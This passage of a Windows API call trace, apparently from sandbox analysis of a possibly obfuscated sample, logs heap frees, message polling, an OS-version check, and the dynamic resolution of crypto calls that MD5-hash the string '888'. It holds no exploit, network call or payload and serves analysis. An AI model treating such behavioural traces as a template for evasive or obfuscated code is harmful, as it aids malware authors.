[0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0216.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.067] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0216.068] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.068] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.068] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0216.068] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0216.068] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.068] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0216.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0216.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0216.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0216.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0216.069] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.069] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0216.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0216.069] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.069] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.069] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0216.069] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.069] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0216.069] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0216.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0216.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0216.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0216.071] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bcd0) returned 1 [0216.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.071] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0216.071] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.071] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.072] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.072] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0216.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.072] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0216.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.073] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0216.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.073] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0216.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.073] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.073] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.073] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0216.073] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.073] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0216.073] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.073] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.074] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.074] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0216.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.074] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0216.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0216.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0216.074] CryptCreateHash (in: hProv=0xa7bcd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0216.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0216.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0216.074] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0216.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0216.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0216.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.075] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0216.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabcc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0216.075] CryptHashData (hHash=0x9e21f8, pbData=0x2a71e88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0216.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.075] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.075] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0216.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.076] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.076] 